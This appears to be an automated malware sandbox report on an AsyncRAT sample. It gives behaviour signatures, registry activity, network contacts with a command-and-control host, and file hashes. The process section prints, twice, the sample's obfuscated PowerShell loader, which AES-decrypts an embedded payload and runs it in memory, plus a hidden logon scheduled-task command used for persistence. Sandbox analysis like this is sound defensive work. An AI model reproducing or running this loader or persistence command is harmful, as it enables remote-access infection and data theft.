Analysis Overview
SHA256
54d46fbfeb589b2847878580392ae4aff98a0c59b0731541e311f5718023688d
Threat Level: Known bad
The file Files.7z was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Async RAT payload
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Reads user/profile data of web browsers
Executes dropped EXE
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-05 13:16
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-05 13:16
Reported
2024-06-05 13:17
Platform
win10v2004-20240508-en
Max time kernel
43s
Max time network
52s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\startup_str_240.bat.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\startup_str_240.bat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\startup_str_181.bat.exe | N/A |
Reads user/profile data of web browsers
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Users\Admin\Desktop\startup_str_240.bat.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Files.7z
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Files.7z"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\startup_str_240.bat" "
C:\Users\Admin\Desktop\startup_str_240.bat.exe
"startup_str_240.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_A_uhLDX = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Desktop\startup_str_240.bat').Split([Environment]::NewLine);foreach ($_A_fLlBB in $_A_uhLDX) { if ($_A_fLlBB.StartsWith(':: @')) { $_A_NbTKf = $_A_fLlBB.Substring(4); break; }; };$_A_NbTKf = [System.Text.RegularExpressions.Regex]::Replace($_A_NbTKf, '_A_', '');$_A_WVlpt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_A_NbTKf);$_A_Nltui = New-Object System.Security.Cryptography.AesManaged;$_A_Nltui.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_A_Nltui.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_A_Nltui.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lGuXRwARexqT9x64aF65VNd3vz0xg4bu9gRf+fDmuaA=');$_A_Nltui.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uoqVYFCFIwzuGh66WuDKhQ==');$_A_jhFfk = $_A_Nltui.CreateDecryptor();$_A_WVlpt = $_A_jhFfk.TransformFinalBlock($_A_WVlpt, 0, $_A_WVlpt.Length);$_A_jhFfk.Dispose();$_A_Nltui.Dispose();$_A_UQaMS = New-Object System.IO.MemoryStream(, $_A_WVlpt);$_A_gYDat = New-Object System.IO.MemoryStream;$_A_LiXRH = New-Object System.IO.Compression.GZipStream($_A_UQaMS, [IO.Compression.CompressionMode]::Decompress);$_A_LiXRH.CopyTo($_A_gYDat);$_A_LiXRH.Dispose();$_A_UQaMS.Dispose();$_A_gYDat.Dispose();$_A_WVlpt = $_A_gYDat.ToArray();$_A_DYwut = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_A_WVlpt);$_A_AkCGN = $_A_DYwut.EntryPoint;$_A_AkCGN.Invoke($null, (, [string[]] ('')))
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\Desktop\startup_str_240')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_181_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_181.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_181.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_181.bat" "
C:\Users\Admin\AppData\Roaming\startup_str_181.bat.exe
"startup_str_181.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_A_uhLDX = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_181.bat').Split([Environment]::NewLine);foreach ($_A_fLlBB in $_A_uhLDX) { if ($_A_fLlBB.StartsWith(':: @')) { $_A_NbTKf = $_A_fLlBB.Substring(4); break; }; };$_A_NbTKf = [System.Text.RegularExpressions.Regex]::Replace($_A_NbTKf, '_A_', '');$_A_WVlpt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_A_NbTKf);$_A_Nltui = New-Object System.Security.Cryptography.AesManaged;$_A_Nltui.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_A_Nltui.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_A_Nltui.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lGuXRwARexqT9x64aF65VNd3vz0xg4bu9gRf+fDmuaA=');$_A_Nltui.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uoqVYFCFIwzuGh66WuDKhQ==');$_A_jhFfk = $_A_Nltui.CreateDecryptor();$_A_WVlpt = $_A_jhFfk.TransformFinalBlock($_A_WVlpt, 0, $_A_WVlpt.Length);$_A_jhFfk.Dispose();$_A_Nltui.Dispose();$_A_UQaMS = New-Object System.IO.MemoryStream(, $_A_WVlpt);$_A_gYDat = New-Object System.IO.MemoryStream;$_A_LiXRH = New-Object System.IO.Compression.GZipStream($_A_UQaMS, [IO.Compression.CompressionMode]::Decompress);$_A_LiXRH.CopyTo($_A_gYDat);$_A_LiXRH.Dispose();$_A_UQaMS.Dispose();$_A_gYDat.Dispose();$_A_WVlpt = $_A_gYDat.ToArray();$_A_DYwut = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_A_WVlpt);$_A_AkCGN = $_A_DYwut.EntryPoint;$_A_AkCGN.Invoke($null, (, [string[]] ('')))
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\startup_str_181')
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | new22.vpndns.net | udp |
| DE | 94.130.130.51:116 | new22.vpndns.net | tcp |
| US | 8.8.8.8:53 | 51.130.130.94.in-addr.arpa | udp |
| DE | 94.130.130.51:116 | new22.vpndns.net | tcp |
Files
C:\Users\Admin\Desktop\startup_str_240.bat
| MD5 | 02dce5d2f3da53f3bfa165bfb6372c53 |
| SHA1 | 699f6a7fde4aa873a4499bdefb3e9bd2c180cc86 |
| SHA256 | 0cc0e3fe599b7bd362dd160efafaefd26c692934682cc13e12575c05aa028a99 |
| SHA512 | cf78595e03f9a65514b5e4b15bf40b204568fad2d956bfbaddd513349df28b8b37ed18d6ca3f7724ab765ea6ca34ff493b427e424a2b7bd2b33206ad871acbc3 |
C:\Users\Admin\Desktop\startup_str_240.bat.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
memory/4104-11-0x00000170417B0000-0x00000170417D2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4yhpgugb.kkr.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4104-19-0x0000017041B80000-0x0000017041DD0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 661739d384d9dfd807a089721202900b |
| SHA1 | 5b2c5d6a7122b4ce849dc98e79a7713038feac55 |
| SHA256 | 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf |
| SHA512 | 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f3b2f7c8e9b3057a4342efce5cb1f648 |
| SHA1 | cbcab1b48cd397259c504d2c915c5c30ea877b06 |
| SHA256 | 2c3dc036ac8d51e14510a0a6bba650d29e55c394b3b564a5f762c2fc1ebc3693 |
| SHA512 | f627a062084919835cdfadcaa06849d6a636e4b2f6a24317c29e78183c02b4e2ffa9cf0911f627efc2143514695a1b3e70141866f61c722039721182cd5fb142 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 75b4b2eecda41cec059c973abb1114c0 |
| SHA1 | 11dadf4817ead21b0340ce529ee9bbd7f0422668 |
| SHA256 | 5540f4ea6d18b1aa94a3349652133a4f6641d456757499b7ab12e7ee8f396134 |
| SHA512 | 87feaf17bd331ed6afd9079fefb1d8f5d3911ababf8ea7542be16c946301a7172a5dc46d249b2192376957468d75bf1c99752529ca77ec0aa78a8d054b3a6626 |
C:\Users\Admin\AppData\Roaming\startup_str_181.vbs
| MD5 | 47494d2160f5389d7933766312b12d8a |
| SHA1 | 0fbf0f34250407171a6b9355d45432f9123f77da |
| SHA256 | c2d635edf26922d3c1d0bbd1812aaa86da10ab60bc8f85a3c962b97c2b3be2e2 |
| SHA512 | 680b86046afdd5d0c0f7ed30de2a0bf128aa50820968bb5d5f00c06ea351c4accfb2e7d0ceb9ba8768c63a0dc90065b8f670805bed02e5c749bc513ce08fedbe |
memory/2316-78-0x000001AC5A260000-0x000001AC5A276000-memory.dmp